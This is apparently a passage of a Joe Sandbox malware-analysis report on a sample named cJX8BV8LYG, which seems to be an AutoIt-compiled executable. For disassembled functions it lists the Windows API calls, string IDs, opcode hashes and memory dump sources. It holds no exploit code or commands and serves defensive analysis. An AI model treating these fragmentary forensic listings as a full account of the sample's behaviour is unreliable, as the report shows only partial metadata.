                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: LoadString$_wcslen
                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                    • API String ID: 4099089115-3080491070
                                    • Opcode ID: 043a79bec4bd8f9fb21b4d44a7cd218424cecd5e6694b9d364cb77921191ba02
                                    • Instruction ID: aefd52fa0a561c8ad1191b437f7f4b0c7f66ca6b50f97c9d45dfd2a0dd3a41d5
                                    • Opcode Fuzzy Hash: 043a79bec4bd8f9fb21b4d44a7cd218424cecd5e6694b9d364cb77921191ba02
                                    • Instruction Fuzzy Hash: 9E516C72940209EADF14EBA0CD5AEFEB778BF04740F144065F605B2192EB2D2F58CB61
                                    Function 007EB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _wcslen$BuffCharUpper
                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                    • API String ID: 1256254125-769500911
                                    • Opcode ID: 4efa01a9c08d9c49f00860df84d59e6beae82086a5df0420244bc8a82a3eeac2
                                    • Instruction ID: b5c8f1131518a161dc3ec0e11c83a80dc9c659e0d8086c87de93e682c3c03ca4
                                    • Opcode Fuzzy Hash: 4efa01a9c08d9c49f00860df84d59e6beae82086a5df0420244bc8a82a3eeac2
                                    • Instruction Fuzzy Hash: 41410B32A02067DACB105F7E88905BFBFA5BFA9754B244229E521DB284F739DD41C790
                                    Function 007F5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 007F53A0
                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007F5416
                                    • GetLastError.KERNEL32 ref: 007F5420
                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 007F54A7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Error$Mode$DiskFreeLastSpace
                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                    • API String ID: 4194297153-14809454
                                    • Opcode ID: 7fc69229ac4e49dc76bcd7a6ed6247cfa1ca2fe8f9652d12040b6f8df2f01020
                                    • Instruction ID: 28f076fd3e5038320a9dba5d240c4890be5e2b5d22c679f430dd9ab3e9fa7c13
                                    • Opcode Fuzzy Hash: 7fc69229ac4e49dc76bcd7a6ed6247cfa1ca2fe8f9652d12040b6f8df2f01020
                                    • Instruction Fuzzy Hash: 16318D75A00649DFC710DF68C488ABABBA8FF05305F148069E705CB392E779DD86CBA1
                                    Function 00813C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateMenu.USER32 ref: 00813C79
                                    • SetMenu.USER32(?,00000000), ref: 00813C88
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00813D10
                                    • IsMenu.USER32(?), ref: 00813D24
                                    • CreatePopupMenu.USER32 ref: 00813D2E
                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00813D5B
                                    • DrawMenuBar.USER32 ref: 00813D63
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                    • String ID: 0$F
                                    • API String ID: 161812096-3044882817
                                    • Opcode ID: 22e2bfa35bf42ec977042237f60a4b31bc8b14905630826d682a2fc997bb9c3a
                                    • Instruction ID: b9bf74969f2ab814fc2d53f55df7e263c5fa9598317d17599ab3a4d766b4ac49
                                    • Opcode Fuzzy Hash: 22e2bfa35bf42ec977042237f60a4b31bc8b14905630826d682a2fc997bb9c3a
                                    • Instruction Fuzzy Hash: E2414A75A01209EFDF14CF64E844AEABBBAFF49354F144029E946E7360D770AA50CB94
                                    Function 00813A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00813A9D
                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00813AA0
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00813AC7
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00813AEA
                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00813B62
                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00813BAC
                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00813BC7
                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00813BE2
                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00813BF6
                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00813C13
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend$LongWindow
                                    • String ID:
                                    • API String ID: 312131281-0
                                    • Opcode ID: 5fc2835313dac28ffefd220d8d97f2a10d59c5a5b0bc568c592656d63e2b974b
                                    • Instruction ID: f0636ba54678e6a80c4fb0fc988a6a73f7cc6e430ecd50d435fe5dd1acdbff65
                                    • Opcode Fuzzy Hash: 5fc2835313dac28ffefd220d8d97f2a10d59c5a5b0bc568c592656d63e2b974b
                                    • Instruction Fuzzy Hash: 09616575A00208AFDB10DFA8CC85EEEB7B8FF09714F100099EA15E72A1D774AE81DB50
                                    Function 007EB12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 007EB151
                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,007EA1E1,?,00000001), ref: 007EB165
                                    • GetWindowThreadProcessId.USER32(00000000), ref: 007EB16C
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007EA1E1,?,00000001), ref: 007EB17B
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 007EB18D
                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,007EA1E1,?,00000001), ref: 007EB1A6
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007EA1E1,?,00000001), ref: 007EB1B8
                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007EA1E1,?,00000001), ref: 007EB1FD
                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,007EA1E1,?,00000001), ref: 007EB212
                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,007EA1E1,?,00000001), ref: 007EB21D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                    • String ID:
                                    • API String ID: 2156557900-0
                                    • Opcode ID: 837134417481e533c584e3fe81786c7612488ee2d9d9a2d95da8c7ac7c61c035
                                    • Instruction ID: 079e565d48c2fe73a94597ffc9bb3826fa1c08998d7b6a75ea2d7e79521501d3
                                    • Opcode Fuzzy Hash: 837134417481e533c584e3fe81786c7612488ee2d9d9a2d95da8c7ac7c61c035
                                    • Instruction Fuzzy Hash: CC318DB5541744BFDB109F65DC48BAF7FADBFA9352F108009FA01D6190D7B89A408F64
                                    Function 007B2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 007B2C94
                                      • Part of subcall function 007B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000), ref: 007B29DE
                                      • Part of subcall function 007B29C8: GetLastError.KERNEL32(00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000,00000000), ref: 007B29F0
                                    • _free.LIBCMT ref: 007B2CA0
                                    • _free.LIBCMT ref: 007B2CAB
                                    • _free.LIBCMT ref: 007B2CB6
                                    • _free.LIBCMT ref: 007B2CC1
                                    • _free.LIBCMT ref: 007B2CCC
                                    • _free.LIBCMT ref: 007B2CD7
                                    • _free.LIBCMT ref: 007B2CE2
                                    • _free.LIBCMT ref: 007B2CED
                                    • _free.LIBCMT ref: 007B2CFB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 37d714a409c08bd7ddb284edee80d4dadce219150d09ccfeef4262bac6829913
                                    • Instruction ID: 648204d11cf72c6ef81b9b5e10a2380d0c51dbfb0e45705f8049b038dee0b542
                                    • Opcode Fuzzy Hash: 37d714a409c08bd7ddb284edee80d4dadce219150d09ccfeef4262bac6829913
                                    • Instruction Fuzzy Hash: 9C118076101108FFCB02EF94D886EDD3BA5BF09350F5148A5FA48AB232DA35EA519F90
                                    Function 00781410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00781459
                                    • OleUninitialize.OLE32(?,00000000), ref: 007814F8
                                    • UnregisterHotKey.USER32(?), ref: 007816DD
                                    • DestroyWindow.USER32(?), ref: 007C24B9
                                    • FreeLibrary.KERNEL32(?), ref: 007C251E
                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 007C254B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                    • String ID: close all
                                    • API String ID: 469580280-3243417748
                                    • Opcode ID: 527544198a20dd8cc87090b83d20c5906b48de651cd8d8f897a5e8f603d361bb
                                    • Instruction ID: 309b142058691c9a85fb3bf1c951b23110126fb5f323b60b76310cb2a7d70457
                                    • Opcode Fuzzy Hash: 527544198a20dd8cc87090b83d20c5906b48de651cd8d8f897a5e8f603d361bb
                                    • Instruction Fuzzy Hash: 1AD14631741212CFCB19EF15D899E69F7A8BF05700F5442ADE54AAB262DB38AD23CF50
                                    Function 007F7DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007F7FAD
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007F7FC1
                                    • GetFileAttributesW.KERNEL32(?), ref: 007F7FEB
                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 007F8005
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007F8017
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007F8060
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 007F80B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CurrentDirectory$AttributesFile
                                    • String ID: *.*
                                    • API String ID: 769691225-438819550
                                    • Opcode ID: 4724db33495ebd27f5d5e62b42829954faaa7b01e3f39fb66876a0d3d0d5b17d
                                    • Instruction ID: a261138cdf0ce34dfff39e974ea7572a8bdf1de91a9cd3c35b89cd038c0e27bc
                                    • Opcode Fuzzy Hash: 4724db33495ebd27f5d5e62b42829954faaa7b01e3f39fb66876a0d3d0d5b17d
                                    • Instruction Fuzzy Hash: F381AF725082099BCB28EF14C8849BEB3E8BF89314F54485EFA95C7350EB39DD45CB52
                                    Function 00785BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetWindowLongW.USER32(?,000000EB), ref: 00785C7A
                                      • Part of subcall function 00785D0A: GetClientRect.USER32(?,?), ref: 00785D30
                                      • Part of subcall function 00785D0A: GetWindowRect.USER32(?,?), ref: 00785D71
                                      • Part of subcall function 00785D0A: ScreenToClient.USER32(?,?), ref: 00785D99
                                    • GetDC.USER32 ref: 007C46F5
                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 007C4708
                                    • SelectObject.GDI32(00000000,00000000), ref: 007C4716
                                    • SelectObject.GDI32(00000000,00000000), ref: 007C472B
                                    • ReleaseDC.USER32(?,00000000), ref: 007C4733
                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007C47C4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                    • String ID: U
                                    • API String ID: 4009187628-3372436214
                                    • Opcode ID: dc012cd65a9063f9e319d295d1407841ff209f6e937642a5df75a9f9371ee430
                                    • Instruction ID: e04664af862dcc791d29a1df6153c278f5663c7ce078071428e3417a7b82a516
                                    • Opcode Fuzzy Hash: dc012cd65a9063f9e319d295d1407841ff209f6e937642a5df75a9f9371ee430
                                    • Instruction Fuzzy Hash: 4F71DC31500205DFCF219F64C994FEA7BB6FF4A364F14426DED556A2AAC3398881DF60
                                    Function 007F359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 007F35E4
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                    • LoadStringW.USER32(00852390,?,00000FFF,?), ref: 007F360A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: LoadString$_wcslen
                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                    • API String ID: 4099089115-2391861430
                                    • Opcode ID: 9f7a17c43fa7aaaf57b599de75c9c1b43ca3d4d865fa5348f329057ac0eb5f1b
                                    • Instruction ID: 65d65c3ac16e6c9929d663fa5a9df8f3895a36fb98f3a8dfdabbb25c509da85a
                                    • Opcode Fuzzy Hash: 9f7a17c43fa7aaaf57b599de75c9c1b43ca3d4d865fa5348f329057ac0eb5f1b
                                    • Instruction Fuzzy Hash: EC514D71840209FADF14FBA0CC4AEFDBB78AF04301F144125F215B22A1EB391A95DB61
                                    Function 007FC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007FC272
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007FC29A
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007FC2CA
                                    • GetLastError.KERNEL32 ref: 007FC322
                                    • SetEvent.KERNEL32(?), ref: 007FC336
                                    • InternetCloseHandle.WININET(00000000), ref: 007FC341
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                    • String ID:
                                    • API String ID: 3113390036-3916222277
                                    • Opcode ID: 129a5ae5e38d27f85029d328874c9a80397d55cedb33587993b1eac6a4cb59f7
                                    • Instruction ID: e64e7af7ea10afca421dc9708970ec24b2503bfc3b7e7572cf3a5838a0f09c5a
                                    • Opcode Fuzzy Hash: 129a5ae5e38d27f85029d328874c9a80397d55cedb33587993b1eac6a4cb59f7
                                    • Instruction Fuzzy Hash: 1C316BB164020CAFD7229F648E88ABB7BFCFF49794B14851EF54692340DB78DD049B62
                                    Function 007E989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,007C3AAF,?,?,Bad directive syntax error,0081CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 007E98BC
                                    • LoadStringW.USER32(00000000,?,007C3AAF,?), ref: 007E98C3
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 007E9987
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: HandleLoadMessageModuleString_wcslen
                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                    • API String ID: 858772685-4153970271
                                    • Opcode ID: db401527baaa06b752d364ffdba53327fb8fceb2fd4bf2e70a4bf9d8337dbc26
                                    • Instruction ID: 850032dbfd793ceed76d4319c50b2e201626729f40095dca1761c1834481d16b
                                    • Opcode Fuzzy Hash: db401527baaa06b752d364ffdba53327fb8fceb2fd4bf2e70a4bf9d8337dbc26
                                    • Instruction Fuzzy Hash: 9B21803294025EEBCF15AF90CC0AEEE7739FF19700F044429F615621A2EB79A628CB51
                                    Function 007E209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetParent.USER32 ref: 007E20AB
                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 007E20C0
                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 007E214D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameParentSend
                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                    • API String ID: 1290815626-3381328864
                                    • Opcode ID: 954ef4df995a81e7c7b6adb950c1f5b0ed06fca05b05a62dd2ccea9e28410c38
                                    • Instruction ID: 9b76620359578d74fe1927c8f218649999d0c4ddcb6bfc58756ad9cc7c600fa9
                                    • Opcode Fuzzy Hash: 954ef4df995a81e7c7b6adb950c1f5b0ed06fca05b05a62dd2ccea9e28410c38
                                    • Instruction Fuzzy Hash: EF11E7766C470EBAF60122259C0ADEA379CEF59724F204116F604E51E3FABD59025614
                                    Function 007BCE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                    • String ID:
                                    • API String ID: 1282221369-0
                                    • Opcode ID: 3f3ab831096e855e14d2466cdc1a8329b5b4a62c2e13f2f6846b48cb715ba659
                                    • Instruction ID: fcc4a50561682fa6e87b73760c1982911850c15150cc4305bd75f76111c9dbb7
                                    • Opcode Fuzzy Hash: 3f3ab831096e855e14d2466cdc1a8329b5b4a62c2e13f2f6846b48cb715ba659
                                    • Instruction Fuzzy Hash: EC611972905301EFDB22AFB49889BFD7BA5EF05310F0486ADF944A7282E63D9D019B50
                                    Function 008150D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00815186
                                    • ShowWindow.USER32(?,00000000), ref: 008151C7
                                    • ShowWindow.USER32(?,00000005,?,00000000), ref: 008151CD
